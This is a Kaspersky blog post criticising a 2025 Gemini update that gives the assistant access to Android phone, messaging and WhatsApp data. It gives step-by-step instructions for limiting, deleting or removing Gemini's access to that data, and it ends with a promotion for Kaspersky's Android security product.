Cisco Talos Blog

Is a Gemini AI update about to kill privacy on your Android device? | Kaspersky official blog

On July 7, 2025, Google rolled out a Gemini update that gives its AI-powered assistant access to Phone, Messages, WhatsApp, and Utilities data on Android devices. The company announced this update via an email to the users of its chatbot — essentially presenting them with a fait accompli. “We’ve made it easier for Gemini to interact with your device”, the email read. “Gemini will soon be able to help you use Phone, Messages, WhatsApp, and Utilities on your phone, whether your Gemini Apps Activity is on or off”.

According to Google, the update improves privacy because users can now use Gemini's features without having to enable Gemini Apps Activity. Pretty convenient, right?

The update applies regardless of whether the Gemini Apps Activity feature is enabled or not. Google pushed the update to all Android versions that support Gemini, starting with Android 10. So, although the company warned users, it clearly failed to ask for their explicit consent. Google has already practiced subtle coercion to use its features before: just a month ago, Gemini was integrated into the Gmail client without any warning.

The email itself contained neither clear instructions for how to disable the new features, nor detailed explanations as to what exactly Gemini would do with the collected data. Users received the email just two weeks before the update was launched.

As you’d expect, the tech community was on the verge of panic. Previously, users who wanted to integrate Gemini with their apps had to explicitly enable Gemini Apps Activity. This allowed Gemini to store and use their data long-term, and potentially gave developers access to it – of course, “only for the purpose of improving Google AI”.

Warning prompt when launching Gemini in the browser for the first time

Google isn’t alone in this. OpenAI, Anthropic, and other AI companies are guilty of the same “improving service quality” excuse. At least Google gives users the illusion of choice. What makes this case different is that, even with Gemini Apps Activity turned off, Google will still retain your conversations with the AI assistant for up to 72 hours — all for the same purposes of safety, security, and feedback.

We won’t debate whether this is good or bad — we’ll just show you how to completely block Gemini’s access to your apps and data. Grab your phone, and let’s go!…

How to disable Gemini via the app?

  1. Open Gemini on your Android device.
  2. Tap your profile picture or initials in the top-right corner.
  3. Select Gemini Apps Activity.
  4. Tap Turn off, or select Turn off and delete activity.

Disabling Gemini via the app

How to disable Gemini via the web interface?

  1. Open Gemini in a browser.
  2. Click the hamburger menu in the top-left corner.
  3. Select Activity, or Settings & help → Activity.
  4. Tap Turn off, or select Turn off and delete activity.

Alternatively, you can reach that option directly to turn off Gemini Apps Activity right there.

Disabling Gemini via the web interface

How to block Gemini from accessing individual apps and services?

If rather than disabling the AI assistant altogether you want to restrict Gemini’s access to data only from certain services like your email or photos, you can customize which apps it can work with and which it cannot.

Disabling Gemini’s access to individual services via the app:

  1. Open the Gemini app.
  2. Go to your profile and select Apps.
  3. Turn off the toggle next to each app or service whose data you don’t want to share with Gemini.

Disabling Gemini’s access to individual services via the app

Disabling Gemini’s access to individual services via the web interface:

  1. Open Gemini in a browser.
  2. Click the hamburger menu in the top-left corner.
  3. Select Settings & help → Apps.
  4. Turn off the toggle next to each app or service whose data you don’t want to share with Gemini.

Alternatively, you can reach that section of the settings directly.

Disabling Gemini’s access to individual services via the web interface

How to configure additional privacy settings for Gemini?

Deleting saved Gemini data:

  1. While in the Gemini app, go to your profile and select Gemini Apps Activity. In a browser, open Activity, click Delete, and select a time range.
    • Last hour/day clears your recent activity.
    • All time clears all your activity.
    • Custom range lets you select a range of data to clear.
  2. Confirm deletion.

Deleting saved Gemini data

Setting up auto-delete for Gemini data:

  1. While in the Gemini app, go to your profile, and select Gemini Apps Activity. In a browser, open Activity.
  2. Choose how long saved data will be kept before it’s deleted: three, 18, or 36 months.

Setting up auto-delete for Gemini data

How to completely remove Gemini from your smartphone?

If you plan not to use Gemini on your phone altogether, you can simply uninstall the app:

  1. Go to Settings and select Apps.
  2. Find Gemini, and tap Uninstall if that option is available.
  3. If you don’t see Uninstall, tap Disable. Gemini is a system app on some phones and thus not easy to remove. For more details on how to deal with this, see Delete the undeletable: how to disable and remove Android bloatware.

If you’re determined not to have any Google services on your phone, consider installing GrapheneOS; however, be forewarned that this is a solution for geeks with a Pixel phone only.

How to check that you’ve successfully disabled Gemini?

When you’re done with the settings, it’s a good idea to verify if your changes have been applied successfully:

  1. Go to the Gemini Activity.
  2. Check that there are no records of your activity.
  3. In the Gemini app, check the state of the toggles in the Apps section.
  4. Repeat these checks after each Google update you install.

To protect your Android device, use tried-and-true security solutions like Kaspersky for Android. This will give you peace of mind knowing you don’t have to worry about malware, your privacy, passwords, or personal and payment data.

Here are a few other posts about the subtleties of privacy in Google services and beyond.

Kaspersky official blog